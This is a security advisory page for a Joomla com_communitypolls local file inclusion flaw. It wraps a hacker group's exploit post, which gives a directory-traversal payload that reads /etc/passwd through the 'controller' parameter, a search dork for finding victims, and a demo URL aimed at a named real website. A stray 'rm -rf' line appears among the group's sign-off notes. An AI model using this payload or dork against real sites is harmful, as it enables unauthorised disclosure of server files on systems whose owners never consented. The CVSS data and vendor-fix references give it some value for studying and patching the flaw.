Joomla Component com_communitypolls LFI Vulnerability

2010-03-24 / 2010-03-25
Credit: kaMtiEz
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

[!]===========================================================================[!] [~] Joomla Component com_communitypolls LFI Vulnerability [~] Author : kaMtiEz (kamzcrew@yahoo.com) [~] Homepage : http://www.indonesiancoder.com [~] Date : 16 February, 2010 [!]===========================================================================[!] [ Software Information ] [+] Vendor : http://www.corejoomla.com/ [+] Price : free [+] Vulnerability : LFI [+] Dork : inurl:"CIHUY" ;) [+] Download : http://www.corejoomla.com/downloads/community-polls/24-comcommunitypollsv1-5-2.html [+] Version : 1.5.2 maybe lower also affected [!]===========================================================================[!] [ Vulnerable File ] http://127.0.0.1/index.php?option=com_communitypolls&controller=[INDONESIANCODER] [ XpL ] ../../../../../../../../../../../../../../../etc/passwd%00 [ d3m0 ] http://www.thesearchers.org/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 etc etc etc ;] [!]===========================================================================[!] [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk [ NOTE ] [+] Rawk ! [+] rm -rf [ QUOTE ] [+] we are not dead INDONESIANCODER stil r0x [+] nothing secure .. [+] e0f

References:

http://www.securityfocus.com/bid/38330
http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
http://secunia.com/advisories/38692
http://packetstormsecurity.org/1002-exploits/joomlacp-lfi.txt
http://osvdb.org/62506


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top